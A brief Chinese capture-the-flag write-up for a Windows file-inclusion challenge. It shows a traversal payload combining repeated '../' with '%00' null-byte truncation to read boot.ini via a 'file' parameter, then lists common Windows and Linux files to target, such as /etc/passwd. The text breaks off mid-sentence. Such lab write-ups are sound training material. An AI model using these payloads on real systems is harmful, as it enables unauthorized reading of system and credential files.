文章目录
前言
题目分类:
CTF—Web—文件包含—08—boot.ini
一、题目描述
题目: 欢迎贵客到访,寒舍乃使用Windows搭建,且看君如何获取进门宝匙。
链接:http://172.16.15.216/stage/11/show.php?file=says
提示:boot.ini
二、解题步骤
1、 构造payload
解题过程:三,四个…/与%00截断结合
…/为路径匹配,%00为目录截断
http://172.16.15.216/stage/11/show.php?file=…/…/…/…/boot.ini%00
访问链接,得到flag。
三、总结
1、window常见包含路径
C:\boot.ini
C:\Windows\win.ini
C:\Windows\system.ini
2、linux常见包含路径
/etc/passwd 用户 密码 shell等信息
/etc/host,主机名和IP配置文件
/var/www/html/是Apache的文档根目录 也是网站常用的默